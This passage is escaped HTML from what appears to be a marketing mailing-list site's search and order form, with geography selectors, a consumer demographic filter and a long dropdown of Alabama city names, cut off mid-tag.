name=\"form_multiple_zip\" method=\"post\" action=\"http://www.emarketingsol.com/demo2.php\">\r\n\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td valign=\"middle\" align=\"right\">Example:</td>\r\n                                                        <td valign=\"middle\" align=\"left\"> 33020, 33069, 33024</td>\r\n                                                    </tr>\r\n                                                    <tr>\r\n                                                        <td valign=\"middle\">Multiple Zip Codes:</td>\r\n\r\n                                                        <td valign=\"middle\"><input name=\"zip\" type=\"text\" size=\"30\"></td>\r\n                                                    </tr>\r\n                                                    <tr>\r\n                                                        <td>&nbsp;</td>\r\n                                                        <td style=\"padding-top:3px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_form('form_multiple_zip');\"></td>\r\n                                                    </tr>\r\n                                                </tbody></table>\r\n\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_entire_usa\" class=\"hide\">\r\n                                            <form id=\"form_entire_usa\" name=\"form_entire_usa\" method=\"post\" action=\"http://173.12.122.137/entire_usa_count.php\">\r\n                                                <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>Entire USA:</td>\r\n                                                        <td style=\"padding-left:5px;\"><input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_form('form_entire_usa');\"></td>\r\n                                                    </tr>\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div class=\"clear\"></div>\r\n                                        <div style=\"display:block; clear:left\">\r\n                                            <table align=\"left\" style=\"display:table; text-align:left; width:350px; float:left; margin-top:5px;\" border=\"0\">\r\n                                                <tbody>\r\n\r\n                                                <tr>\r\n                                                    <td><input id=\"city_radio\" name=\"consumer_search\" value=\"1\" onclick=\"showLocations();\" type=\"radio\" checked=\"checked\"><label for=\"city_radio\">City</label></td>\r\n                                                    <td><input id=\"state_radio\" name=\"consumer_search\" value=\"2\" onclick=\"showLocations();\" type=\"radio\"><label for=\"state_radio\">State</label></td>\r\n                                                    <td><input id=\"county_radio\" name=\"consumer_search\" value=\"3\" onclick=\"showLocations();\" type=\"radio\"><label for=\"county_radio\">County</label></td>\r\n                                                    <td><input id=\"zip_radio\" name=\"consumer_search\" value=\"4\" onclick=\"showLocations();\" type=\"radio\"><label for=\"zip_radio\">Zip</label></td>\r\n                                                    <td><input id=\"entire_usa_radio\" name=\"consumer_search\" value=\"5\" onclick=\"showLocations();\" type=\"radio\"><label for=\"entire_usa_radio\">Entire USA</label>&nbsp;&nbsp;</td>\r\n\r\n                                                    <!--            <td><input id=\"multiple_zip_radio\" name=\"consumer_search\" value=\"5\" onclick=\"showLocations();\" type=\"radio\"><label for=\"multiple_zip_radio\">Multiple Zip</label></td>\r\n                                                    -->\t\t</tr>\r\n                                                </tbody></table>\r\n                                            <div style=\"padding:25px 0 5px 0; text-align:left\">\r\n                                                <a href=\"javascript:void(0);\" onclick=\"showConsumerAdv();\">Advanced Filter\r\n                                                    <span id=\"show-consumer-adv-triangle\" class=\"ui-icon  ui-icon-triangle-1-n\" style=\"display:inline-block\"></span></a>\r\n\r\n                                            </div>\r\n\r\n                                        </div>\r\n\r\n                                    </div>\r\n                                    <div id=\"dv_consumer_adv\" style=\"padding: 5px; border-top:solid 1px #fe8510;\">\r\n                                        <form id=\"form_consumer_adv\">\r\n                                            <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"border-collapse: collapse;\">\r\n\r\n                                                <tbody><tr>\r\n                                                    <td style=\"padding-top:5px;\">Phone:</td>\r\n                                                    <td style=\"padding-top:5px; padding-left:5px;\"><input type=\"checkbox\" name=\"phone\" id=\"phone\" value=\"yes\"> <label for=\"phone\">Only include listings with phone numbers</label> </td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-top:5px;\">Gender:</td>\r\n                                                    <td style=\"padding-top:5px; padding-left:5px;\"><input type=\"radio\" name=\"gender\" id=\"gender_both\" value=\"0\" checked=\"\"> <label for=\"gender_both\">Both</label> &nbsp;\r\n                                                        <input type=\"radio\" name=\"gender\" id=\"gender_m\" value=\"m\"> <label for=\"gender_m\">Male</label>\r\n                                                        &nbsp;\r\n                                                        <input type=\"radio\" name=\"gender\" id=\"gender_f\" value=\"f\"> <label for=\"gender_f\">Female</label>\r\n                                                    </td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-top:5px;\">Age:</td>\r\n                                                    <td style=\"padding-top:5px; padding-left:5px;\"><input type=\"text\" name=\"age_min\" id=\"age_min\" size=\"6\" placeholder=\"Min\">\r\n                                                        to <input type=\"text\" name=\"age_max\" id=\"age_max\" size=\"6\" placeholder=\"Max\"> (e.g. 18 to 50)</td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-top:5px;\">Yearly Income:</td>\r\n                                                    <td style=\"padding-top:5px; padding-left:5px;\"><input type=\"text\" name=\"income_min\" id=\"income_min\" size=\"6\" placeholder=\"Min\">\r\n                                                        to <input type=\"text\" name=\"income_max\" id=\"income_max\" size=\"6\" placeholder=\"Max\"> (e.g. 1000 to 5000)</td>\r\n                                                </tr>\r\n                                                <tr>\r\n                                                    <td style=\"padding-top:5px; padding-bottom:5px;\">Home Value:</td>\r\n                                                    <td style=\"padding-top:5px; padding-bottom:5px; padding-left:5px;\"><input type=\"text\" name=\"house_value_min\" id=\"house_value_min\" size=\"6\" placeholder=\"Min\">\r\n                                                        to <input type=\"text\" name=\"house_value_max\" id=\"house_value_max\" size=\"6\" placeholder=\"Max\"> (e.g. 1000 to 5000)</td>\r\n                                                </tr>\r\n                                                                                                <tr>\r\n                                                    <td colspan=\"2\" style=\"padding-left:5px;\"><br><span class=\"small_text\">* Advanced Filter is an additional $249</span></td>\r\n                                                </tr>\r\n                                            </tbody></table>\r\n                                        </form>\r\n                                    </div>\r\n                                    <div class=\"clear\"></div>\r\n                                    <!-- tab 1 data ends here -->\r\n                                </div>\r\n\r\n                            </div>\r\n\r\n\r\n\r\n\r\n\r\n                            <div id=\"tabs-2\" class=\"ui-tabs-hide\">\r\n                                <!-- Consumer -->\r\n                                <div style=\"width:360px; margin:10px;background-color:#ffffff; border:solid 1px #fe8510\" class=\"ui-corner-all\">\r\n                                    <div style=\"margin:5px; text-align:left\">\r\n                                        <span onclick=\"$('#dv_business_geo').toggle();\" style=\"cursor:pointer; font-weight:bold\">Geography</span>\r\n                                    </div>\r\n                                    <div id=\"dv_business_geo\" style=\"margin:5px; text-align:left; display:table;\">\r\n                                        <!-- Business Geo starts -->\r\n                                        <!-- Tab 1 Data starts from here -->\r\n                                        <div id=\"dv_city_business\" class=\"show\">\r\n                                            <form id=\"form_city_business\" name=\"form_city_business\" method=\"post\" action=\"http://173.12.122.137/biz_cart.php?cmd=city_count\">\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>City:</td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <div id=\"inner_cities_business\" style=\"width:125px;\">\r\n                                                                <select class=\"multiselect\" name=\"city[]\"><option value=\"Abbeville\">Abbeville</option><option value=\"Abernant\">Abernant</option><option value=\"Adamsville\">Adamsville</option><option value=\"Addison\">Addison</option><option value=\"Adger\">Adger</option><option value=\"Akron\">Akron</option><option value=\"Alabaster\">Alabaster</option><option value=\"Alberta\">Alberta</option><option value=\"Albertville\">Albertville</option><option value=\"Alexander City\">Alexander City</option><option value=\"Alexandria\">Alexandria</option><option value=\"Aliceville\">Aliceville</option><option value=\"Allgood\">Allgood</option><option value=\"Alma\">Alma</option><option value=\"Alpine\">Alpine</option><option value=\"Alton\">Alton</option><option value=\"Altoona\">Altoona</option><option value=\"Andalusia\">Andalusia</option><option value=\"Anderson\">Anderson</option><option value=\"Annemanie\">Annemanie</option><option value=\"Anniston\">Anniston</option><option value=\"Arab\">Arab</option><option value=\"Ardmore\">Ardmore</option><option value=\"Ariton\">Ariton</option><option value=\"Arley\">Arley</option><option value=\"Arlington\">Arlington</option><option value=\"Ashford\">Ashford</option><option value=\"Ashland\">Ashland</option><option value=\"Ashville\">Ashville</option><option value=\"Athens\">Athens</option><option value=\"Atmore\">Atmore</option><option value=\"Attalla\">Attalla</option><option value=\"Auburn\">Auburn</option><option value=\"Auburn University\">Auburn University</option><option value=\"Autaugaville\">Autaugaville</option><option value=\"Axis\">Axis</option><option value=\"Baileyton\">Baileyton</option><option value=\"Banks\">Banks</option><option value=\"Bankston\">Bankston</option><option value=\"Bay Minette\">Bay Minette</option><option value=\"Bayou La Batre\">Bayou La Batre</option><option value=\"Bear Creek\">Bear Creek</option><option value=\"Beatrice\">Beatrice</option><option value=\"Beaverton\">Beaverton</option><option value=\"Belk\">Belk</option><option value=\"Bellamy\">Bellamy</option><option value=\"Belle Mina\">Belle Mina</option><option value=\"Bellwood\">Bellwood</option><option value=\"Berry\">Berry</option><option value=\"Bessemer\">Bessemer</option><option value=\"Billingsley\">Billingsley</option><option value=\"Birmingham\">Birmingham</option><option value=\"Black\">Black</option><option value=\"Blountsville\">Blountsville</option><option value=\"Boaz\">Boaz</option><option value=\"Boligee\">Boligee</option><option value=\"Bon Air\">Bon Air</option><option value=\"Bon Secour\">Bon Secour</option><option value=\"Booth\">Booth</option><option value=\"Boykin\">Boykin</option><option value=\"Brantley\">Brantley</option><option value=\"Bremen\">Bremen</option><option value=\"Brent\">Brent</option><option value=\"Brewton\">Brewton</option><option value=\"Bridgeport\">Bridgeport</option><option value=\"Brierfield\">Brierfield</option><option value=\"Brilliant\">Brilliant</option><option value=\"Brooklyn\">Brooklyn</option><option value=\"Brookside\">Brookside</option><option value=\"Brookwood\">Brookwood</option><option value=\"Brownsboro\">Brownsboro</option><option value=\"Brundidge\">Brundidge</option><option value=\"Bryant\">Bryant</option><option value=\"Bucks\">Bucks</option><option value=\"Buhl\">Buhl</option><option value=\"Burnwell\">Burnwell</option><option value=\"Butler\">Butler</option><option value=\"Bynum\">Bynum</option><option value=\"Calera\">Calera</option><option value=\"Calvert\">Calvert</option><option value=\"Camden\">Camden</option><option value=\"Camp Hill\">Camp Hill</option><option value=\"Campbell\">Campbell</option><option value=\"Capshaw\">Capshaw</option><option value=\"Carbon Hill\">Carbon Hill</option><option value=\"Cardiff\">Cardiff</option><option value=\"Carlton\">Carlton</option><option value=\"Carrollton\">Carrollton</option><option value=\"Castleberry\">Castleberry</option><option value=\"Catherine\">Catherine</option><option value=\"Cecil\">Cecil</option><option value=\"Cedar Bluff\">Cedar Bluff</option><option value=\"Centre\">Centre</option><option value=\"Centreville\">Centreville</option><option value=\"Chancellor\">Chancellor</option><option value=\"Chapman\">Chapman</option><option value=\"Chatom\">Chatom</option><option value=\"Chelsea\">Chelsea</option><option value=\"Cherokee\">Cherokee</option><option value=\"Childersburg\">Childersburg</option><option value=\"Choccolocco\">Choccolocco</option><option value=\"Chunchula\">Chunchula</option><option value=\"Citronelle\">Citronelle</option><option value=\"Clanton\">Clanton</option><option value=\"Clay\">Clay</option><option value=\"Clayton\">Clayton</option><option value=\"Cleveland\">Cleveland</option><option value=\"Clinton\">Clinton</option><option value=\"Clio\">Clio</option><option value=\"Clopton\">Clopton</option><option value=\"Cloverdale\">Cloverdale</option><option value=\"Coaling\">Coaling</option><option value=\"Coden\">Coden</option><option value=\"Coffee Springs\">Coffee Springs</option><option value=\"Coffeeville\">Coffeeville</option><option value=\"Coker\">Coker</option><option value=\"Collinsville\">Collinsville</option><option value=\"Columbia\">Columbia</option><option value=\"Columbiana\">Columbiana</option><option value=\"Cook Springs\">Cook Springs</option><option value=\"Coosada\">Coosada</option><option value=\"Cordova\">Cordova</option><option value=\"Cottondale\">Cottondale</option><option value=\"Cottonton\">Cottonton</option><option value=\"Cottonwood\">Cottonwood</option><option value=\"Courtland\">Courtland</option><option value=\"Cowarts\">Cowarts</option><option value=\"Coy\">Coy</option><option value=\"Cragford\">Cragford</option><option value=\"Crane Hill\">Crane Hill</option><option value=\"Creola\">Creola</option><option value=\"Cromwell\">Cromwell</option><option value=\"Cropwell\">Cropwell</option><option value=\"Crossville\">Crossville</option><option value=\"Cuba\">Cuba</option><option value=\"Cullman\">Cullman</option><option value=\"Cusseta\">Cusseta</option><option value=\"Dadeville\">Dadeville</option><option value=\"Daleville\">Daleville</option><option value=\"Danville\">Danville</option><option value=\"Daphne\">Daphne</option><option value=\"Dauphin Island\">Dauphin Island</option><option value=\"Daviston\">Daviston</option><option value=\"Dawson\">Dawson</option><option value=\"De Armanville\">De Armanville</option><option value=\"Deatsville\">Deatsville</option><option value=\"Decatur\">Decatur</option><option value=\"Deer Park\">Deer Park</option><option value=\"Delmar\">Delmar</option><option value=\"Delta\">Delta</option><option value=\"Demopolis\">Demopolis</option><option value=\"Detroit\">Detroit</option><option value=\"Dickinson\">Dickinson</option><option value=\"Dixons Mills\">Dixons Mills</option><option value=\"Docena\">Docena</option><option value=\"Dolomite\">Dolomite</option><option value=\"Dora\">Dora</option><option value=\"Dothan\">Dothan</option><option value=\"Double Springs\">Double Springs</option><option value=\"Douglas\">Douglas</option><option value=\"Dozier\">Dozier</option><option value=\"Duncanville\">Duncanville</option><option value=\"Dutton\">Dutton</option><option value=\"East Tallassee\">East Tallassee</option><option value=\"Eastaboga\">Eastaboga</option><option value=\"Echola\">Echola</option><option value=\"Eclectic\">Eclectic</option><option value=\"Edwardsville\">Edwardsville</option><option value=\"Eight Mile\">Eight Mile</option><option value=\"Elba\">Elba</option><option value=\"Elberta\">Elberta</option><option value=\"Eldridge\">Eldridge</option><option value=\"Elkmont\">Elkmont</option><option value=\"Elmore\">Elmore</option><option value=\"Elrod\">Elrod</option><option value=\"Emelle\">Emelle</option><option value=\"Empire\">Empire</option><option value=\"Enterprise\">Enterprise</option><option value=\"Epes\">Epes</option><option value=\"Equality\">Equality</option><option value=\"Estillfork\">Estillfork</option><option value=\"Ethelsville\">Ethelsville</option><option value=\"Eufaula\">Eufaula</option><option value=\"Eutaw\">Eutaw</option><option value=\"Eva\">Eva</option><option value=\"Evergreen\">Evergreen</option><option value=\"Excel\">Excel</option><option value=\"Fackler\">Fackler</option><option value=\"Fairfield\">Fairfield</option><option value=\"Fairhope\">Fairhope</option><option value=\"Falkville\">Falkville</option><option value=\"Faunsdale\">Faunsdale</option><option value=\"Fayette\">Fayette</option><option value=\"Fitzpatrick\">Fitzpatrick</option><option value=\"Five Points\">Five Points</option><option value=\"Flat Rock\">Flat Rock</option><option value=\"Flomaton\">Flomaton</option><option value=\"Florala\">Florala</option><option value=\"Florence\">Florence</option><option value=\"Foley\">Foley</option><option value=\"Forest Home\">Forest Home</option><option value=\"Forkland\">Forkland</option><option value=\"Fort Davis\">Fort Davis</option><option value=\"Fort Deposit\">Fort Deposit</option><option value=\"Fort Mitchell\">Fort Mitchell</option><option value=\"Fort Payne\">Fort Payne</option><option value=\"Fort Rucker\">Fort Rucker</option><option value=\"Fosters\">Fosters</option><option value=\"Franklin\">Franklin</option><option value=\"Frankville\">Frankville</option><option value=\"Frisco City\">Frisco City</option><option value=\"Fruitdale\">Fruitdale</option><option value=\"Fruithurst\">Fruithurst</option><option value=\"Fulton\">Fulton</option><option value=\"Fultondale\">Fultondale</option><option value=\"Furman\">Furman</option><option value=\"Fyffe\">Fyffe</option><option value=\"Gadsden\">Gadsden</option><option value=\"Gainestown\">Gainestown</option><option value=\"Gainesville\">Gainesville</option><option value=\"Gallant\">Gallant</option><option value=\"Gallion\">Gallion</option><option value=\"Gantt\">Gantt</option><option value=\"Garden City\">Garden City</option><option value=\"Gardendale\">Gardendale</option><option value=\"Gaylesville\">Gaylesville</option><option value=\"Geneva\">Geneva</option><option value=\"Georgiana\">Georgiana</option><option value=\"Geraldine\">Geraldine</option><option value=\"Gilbertown\">Gilbertown</option><option value=\"Glen Allen\">Glen Allen</option><option value=\"Glenwood\">Glenwood</option><option value=\"Goodsprings\">Goodsprings</option><option value=\"Goodwater\">Goodwater</option><option value=\"Goodway\">Goodway</option><option value=\"Gordo\">Gordo</option><option value=\"Gordon\">Gordon</option><option value=\"Goshen\">Goshen</option><option value=\"Grady\">Grady</option><option value=\"Graham\">Graham</option><option value=\"Grand Bay\">Grand Bay</option><option value=\"Grant\">Grant</option><option value=\"Graysville\">Graysville</option><option value=\"Green Pond\">Green Pond</option><option value=\"Greensboro\">Greensboro</option><option value=\"Greenville\">Greenville</option><option value=\"Grove Hill\">Grove Hill</option><option value=\"Grove Oak\">Grove Oak</option><option value=\"Guin\">Guin</option><option value=\"Gulf Shores\">Gulf Shores</option><option value=\"Guntersville\">Guntersville</option><option value=\"Gurley\">Gurley</option><option value=\"Hackleburg\">Hackleburg</option><option value=\"Haleyville\">Haleyville</option><option value=\"Hamilton\">Hamilton</option><option value=\"Hanceville\">Hanceville</option><option value=\"Hardaway\">Hardaway</option><option value=\"Harpersville\">Harpersville</option><option value=\"Hartford\">Hartford</option><option value=\"Hartselle\">Hartselle</option><option value=\"Harvest\">Harvest</option><option value=\"Hatchechubbee\">Hatchechubbee</option><option value=\"Hayden\">Hayden</option><option value=\"Hayneville\">Hayneville</option><option value=\"Hazel Green\">Hazel Green</option><option value=\"Headland\">Headland</option><option value=\"Heflin\">Heflin</option><option value=\"Helena\">Helena</option><option value=\"Henagar\">Henagar</option><option value=\"Higdon\">Higdon</option><option value=\"Highland Home\">Highland Home</option><option value=\"Hillsboro\">Hillsboro</option><option value=\"Hodges\">Hodges</option><option value=\"Hollins\">Hollins</option><option value=\"Holly Pond\">Holly Pond</option><option value=\"Hollytree\">Hollytree</option><option value=\"Hollywood\">Hollywood</option><option value=\"Holy Trinity\">Holy Trinity</option><option value=\"Honoraville\">Honoraville</option><option value=\"Hope Hull\">Hope Hull</option><option value=\"Horton\">Horton</option><option value=\"Houston\">Houston</option><option value=\"Huntsville\">Huntsville</option><option value=\"Hurtsboro\">Hurtsboro</option><option value=\"Huxford\">Huxford</option><option value=\"Ider\">Ider</option><option value=\"Irvington\">Irvington</option><option value=\"Jachin\">Jachin</option><option value=\"Jack\">Jack</option><option value=\"Jackson\">Jackson</option><option value=\"Jacksons Gap\">Jacksons Gap</option><option value=\"Jacksonville\">Jacksonville</option><option value=\"Jasper\">Jasper</option><option value=\"Jefferson\">Jefferson</option><option value=\"Jemison\">Jemison</option><option value=\"Jones\">Jones</option><option value=\"Joppa\">Joppa</option><option value=\"Kansas\">Kansas</option><option value=\"Kellerman\">Kellerman</option><option value=\"Kellyton\">Kellyton</option><option value=\"Kennedy\">Kennedy</option><option value=\"Kent\">Kent</option><option value=\"Killen\">Killen</option><option value=\"Kimberly\">Kimberly</option><option value=\"Kinston\">Kinston</option><option value=\"Knoxville\">Knoxville</option><option value=\"Laceys Spring\">Laceys Spring</option><option value=\"Lafayette\">Lafayette</option><option value=\"Lanett\">Lanett</option><option value=\"Langston\">Langston</option><option value=\"Lapine\">Lapine</option><option value=\"Lawley\">Lawley</option><option value=\"Leeds\">Leeds</option><option value=\"Leesburg\">Leesburg</option><option value=\"Leighton\">Leighton</option><option value=\"Lenox\">Lenox</option><option value=\"Leroy\">Leroy</option><option value=\"Lester\">Lester</option><option value=\"Letohatchee\">Letohatchee</option><option value=\"Lexington\">Lexington</option><option value=\"Lillian\">Lillian</option><option value=\"Lincoln\">Lincoln</option><option value=\"Linden\">Linden</option><option value=\"Lineville\">Lineville</option><option value=\"Lisman\">Lisman</option><option value=\"Little River\">Little River</option><option value=\"Livingston\">Livingston</option><option value=\"Loachapoka\">Loachapoka</option><option value=\"Lockhart\">Lockhart</option><option value=\"Locust Fork\">Locust Fork</option><option value=\"Logan\">Logan</option><option value=\"Louisville\">Louisville</option><option value=\"Lower Peach Tree\">Lower Peach Tree</option><option value=\"Lowndesboro\">Lowndesboro</option><option value=\"Loxley\">Loxley</option><option value=\"Luverne\">Luverne</option><option value=\"Lynn\">Lynn</option><option value=\"Madison\">Madison</option><option value=\"Magnolia\">Magnolia</option><option value=\"Magnolia Springs\">Magnolia Springs</option><option value=\"Malcolm\">Malcolm</option><option value=\"Malvern\">Malvern</option><option value=\"Maplesville\">Maplesville</option><option value=\"Marbury\">Marbury</option><option value=\"Margaret\">Margaret</option><option value=\"Marion\">Marion</option><option value=\"Marion Junction\">Marion Junction</option><option value=\"Mathews\">Mathews</option><option value=\"Maylene\">Maylene</option><option value=\"Mc Kenzie\">Mc Kenzie</option><option value=\"McCalla\">McCalla</option><option value=\"McIntosh\">McIntosh</option><option value=\"McShan\">McShan</option><option value=\"McWilliams\">McWilliams</option><option value=\"Megargel\">Megargel</option><option value=\"Melvin\">Melvin</option><option value=\"Mentone\">Mentone</option><option value=\"Meridianville\">Meridianville</option><option value=\"Mexia\">Mexia</option><option value=\"Midland City\">Midland City</option><option value=\"Midway\">Midway</option><option value=\"Millbrook\">Millbrook</option><option value=\"Millerville\">Millerville</option><option value=\"Millport\">Millport</option><option value=\"Millry\">Millry</option><option value=\"Minter\">Minter</option><option value=\"Mobile\">Mobile</option><option value=\"Monroeville\">Monroeville</option><option value=\"Montevallo\">Montevallo</option><option value=\"Montgomery\">Montgomery</option><option value=\"Montrose\">Montrose</option><option value=\"Moody\">Moody</option><option value=\"Mooresville\">Mooresville</option><option value=\"Morris\">Morris</option><option value=\"Morvin\">Morvin</option><option value=\"Moulton\">Moulton</option><option value=\"Moundville\">Moundville</option><option value=\"Mount Hope\">Mount Hope</option><option value=\"Mount Meigs\">Mount Meigs</option><option value=\"Mount Olive\">Mount Olive</option><option value=\"Mount Vernon\">Mount Vernon</option><option value=\"Mulga\">Mulga</option><option value=\"Munford\">Munford</option><option value=\"Muscadine\">Muscadine</option><option value=\"Muscle Shoals\">Muscle Shoals</option><option value=\"Myrtlewood\">Myrtlewood</option><option value=\"Nanafalia\">Nanafalia</option><option value=\"Natural Bridge\">Natural Bridge</option><option value=\"Nauvoo\">Nauvoo</option><option value=\"Needham\">Needham</option><option value=\"New Brockton\">New Brockton</option><option value=\"New Castle\">New Castle</option><option value=\"New Hope\">New Hope</option><option value=\"New Market\">New Market</option><option value=\"Newbern\">Newbern</option><option value=\"Newton\">Newton</option><option value=\"Newville\">Newville</option><option value=\"Normal\">Normal</option><option value=\"Northport\">Northport</option><option value=\"Notasulga\">Notasulga</option><option value=\"Oak Hill\">Oak Hill</option><option value=\"Oakman\">Oakman</option><option value=\"Odenville\">Odenville</option><option value=\"Ohatchee\">Ohatchee</option><option value=\"Oneonta\">Oneonta</option><option value=\"Opelika\">Opelika</option><option value=\"Opp\">Opp</option><option value=\"Orange Beach\">Orange Beach</option><option value=\"Orrville\">Orrville</option><option value=\"Owens Cross Roads\">Owens Cross Roads</option><option value=\"Oxford\">Oxford</option><option value=\"Ozark\">Ozark</option><option value=\"Paint Rock\">Paint Rock</option><option value=\"Palmerdale\">Palmerdale</option><option value=\"Panola\">Panola</option><option value=\"Pansey\">Pansey</option><option value=\"Parrish\">Parrish</option><option value=\"Pelham\">Pelham</option><option value=\"Pell City\">Pell City</option><option value=\"Pennington\">Pennington</option><option value=\"Perdido\">Perdido</option><option value=\"Perdue Hill\">Perdue Hill</option><option value=\"Perote\">Perote</option><option value=\"Peterman\">Peterman</option><option value=\"Peterson\">Peterson</option><option value=\"Petrey\">Petrey</option><option value=\"Phenix City\">Phenix City</option><option value=\"Phil Campbell\">Phil Campbell</option><option value=\"Piedmont\">Piedmont</option><option value=\"Pike Road\">Pike Road</option><option value=\"Pinckard\">Pinckard</option><option value=\"Pine Apple\">Pine Apple</option><option value=\"Pine Hill\">Pine Hill</option><option value=\"Pine Level\">Pine Level</option><option value=\"Pinson\">Pinson</option><option value=\"Pisgah\">Pisgah</option><option value=\"Pittsview\">Pittsview</option><option value=\"Plantersville\">Plantersville</option><option value=\"Pleasant Grove\">Pleasant Grove</option><option value=\"Point Clear\">Point Clear</option><option value=\"Prattville\">Prattville</option><option value=\"Princeton\">Princeton</option><option value=\"Quinton\">Quinton</option><option value=\"Ragland\">Ragland</option><option value=\"Rainbow City\">Rainbow City</option><option value=\"Rainsville\">Rainsville</option><option value=\"Ralph\">Ralph</option><option value=\"Ramer\">Ramer</option><option value=\"Ranburne\">Ranburne</option><option value=\"Randolph\">Randolph</option><option value=\"Range\">Range</option><option value=\"Red Bay\">Red Bay</option><option value=\"Red Level\">Red Level</option><option value=\"Reform\">Reform</option><option value=\"Remlap\">Remlap</option><option value=\"Repton\">Repton</option><option value=\"River Falls\">River Falls</option><option value=\"Riverside\">Riverside</option><option value=\"Roanoke\">Roanoke</option><option value=\"Robertsdale\">Robertsdale</option><option value=\"Rockford\">Rockford</option><option value=\"Rogersville\">Rogersville</option><option value=\"Russellville\">Russellville</option><option value=\"Rutledge\">Rutledge</option><option value=\"Ryland\">Ryland</option><option value=\"Safford\">Safford</option><option value=\"Saginaw\">Saginaw</option><option value=\"Saint Elmo\">Saint Elmo</option><option value=\"Saint Stephens\">Saint Stephens</option><option value=\"Salem\">Salem</option><option value=\"Salitpa\">Salitpa</option><option value=\"Samantha\">Samantha</option><option value=\"Samson\">Samson</option><option value=\"Saraland\">Saraland</option><option value=\"Sardis\">Sardis</option><option value=\"Satsuma\">Satsuma</option><option value=\"Sawyerville\">Sawyerville</option><option value=\"Sayre\">Sayre</option><option value=\"Scottsboro\">Scottsboro</option><option value=\"Seale\">Seale</option><option value=\"Section\">Section</option><option value=\"Selma\">Selma</option><option value=\"Seminole\">Seminole</option><option value=\"Semmes\">Semmes</option><option value=\"Shannon\">Shannon</option><option value=\"Sheffield\">Sheffield</option><option value=\"Shelby\">Shelby</option><option value=\"Shorter\">Shorter</option><option value=\"Shorterville\">Shorterville</option><option value=\"Silas\">Silas</option><option value=\"Siluria\">Siluria</option><option value=\"Silverhill\">Silverhill</option><option value=\"Sipsey\">Sipsey</option><option value=\"Skipperville\">Skipperville</option><option value=\"Slocomb\">Slocomb</option><option value=\"Smiths Station\">Smiths Station</option><option value=\"Somerville\">Somerville</option><option value=\"Spanish Fort\">Spanish Fort</option><option value=\"Spring Garden\">Spring Garden</option><option value=\"Springville\">Springville</option><option value=\"Spruce Pine\">Spruce Pine</option><option value=\"Stanton\">Stanton</option><option value=\"Stapleton\">Stapleton</option><option value=\"Steele\">Steele</option><option value=\"Sterrett\">Sterrett</option><option value=\"Stevenson\">Stevenson</option><option value=\"Stockton\">Stockton</option><option value=\"Sulligent\">Sulligent</option><option value=\"Sumiton\">Sumiton</option><option value=\"Summerdale\">Summerdale</option><option value=\"Sunflower\">Sunflower</option><option value=\"Sweet Water\">Sweet Water</option><option value=\"Sycamore\">Sycamore</option><option value=\"Sylacauga\">Sylacauga</option><option value=\"Sylvania\">Sylvania</option><option value=\"Talladega\">Talladega</option><option value=\"Tallassee\">Tallassee</option><option value=\"Tanner\">Tanner</option><option value=\"Theodore\">Theodore</option><option value=\"Thomaston\">Thomaston</option><option value=\"Thomasville\">Thomasville</option><option value=\"Thorsby\">Thorsby</option><option value=\"Tibbie\">Tibbie</option><option value=\"Titus\">Titus</option><option value=\"Toney\">Toney</option><option value=\"Town Creek\">Town Creek</option><option value=\"Townley\">Townley</option><option value=\"Toxey\">Toxey</option><option value=\"Trafford\">Trafford</option><option value=\"Trenton\">Trenton</option><option value=\"Trinity\">Trinity</option><option value=\"Troy\">Troy</option><option value=\"Trussville\">Trussville</option><option value=\"Tuscaloosa\">Tuscaloosa</option><option value=\"Tuscumbia\">Tuscumbia</option><option value=\"Tuskegee\">Tuskegee</option><option value=\"Tuskegee Institute\">Tuskegee Institute</option><option value=\"Tyler\">Tyler</option><option value=\"Union Grove\">Union Grove</option><option value=\"Union Springs\">Union Springs</option><option value=\"Uniontown\">Uniontown</option><option value=\"Uriah\">Uriah</option><option value=\"Valhermoso Springs\">Valhermoso Springs</option><option value=\"Valley\">Valley</option><option value=\"Valley Head\">Valley Head</option><option value=\"Vance\">Vance</option><option value=\"Vandiver\">Vandiver</option><option value=\"Verbena\">Verbena</option><option value=\"Vernon\">Vernon</option><option value=\"Vina\">Vina</option><option value=\"Vincent\">Vincent</option><option value=\"Vinegar Bend\">Vinegar Bend</option><option value=\"Vinemont\">Vinemont</option><option value=\"Vredenburgh\">Vredenburgh</option><option value=\"Wadley\">Wadley</option><option value=\"Wagarville\">Wagarville</option><option value=\"Walnut Grove\">Walnut Grove</option><option value=\"Ward\">Ward</option><option value=\"Warrior\">Warrior</option><option value=\"Waterloo\">Waterloo</option><option value=\"Watson\">Watson</option><option value=\"Wattsville\">Wattsville</option><option value=\"Waverly\">Waverly</option><option value=\"Weaver\">Weaver</option><option value=\"Webb\">Webb</option><option value=\"Wedowee\">Wedowee</option><option value=\"Wellington\">Wellington</option><option value=\"Weogufka\">Weogufka</option><option value=\"West Blocton\">West Blocton</option><option value=\"West Greene\">West Greene</option><option value=\"Westover\">Westover</option><option value=\"Wetumpka\">Wetumpka</option><option value=\"Whatley\">Whatley</option><option value=\"Wilmer\">Wilmer</option><option value=\"Wilsonville\">Wilsonville</option><option value=\"Wilton\">Wilton</option><option value=\"Winfield\">Winfield</option><option value=\"Wing\">Wing</option><option value=\"Woodland\">Woodland</option><option value=\"Woodstock\">Woodstock</option><option value=\"Woodville\">Woodville</option><option value=\"York\">York</option></select>\r\n                                                            </div>\r\n                                                        </td>\r\n                                                        <td align=\"left\">\r\n                                                            <select name=\"state\" onchange=\"loadCities_business(this.value);\"><option value=\"AL\">AL</option><option value=\"AK\">AK</option><option value=\"AZ\">AZ</option><option value=\"AR\">AR</option><option value=\"CA\">CA</option><option value=\"CO\">CO</option><option value=\"CT\">CT</option><option value=\"DE\">DE</option><option 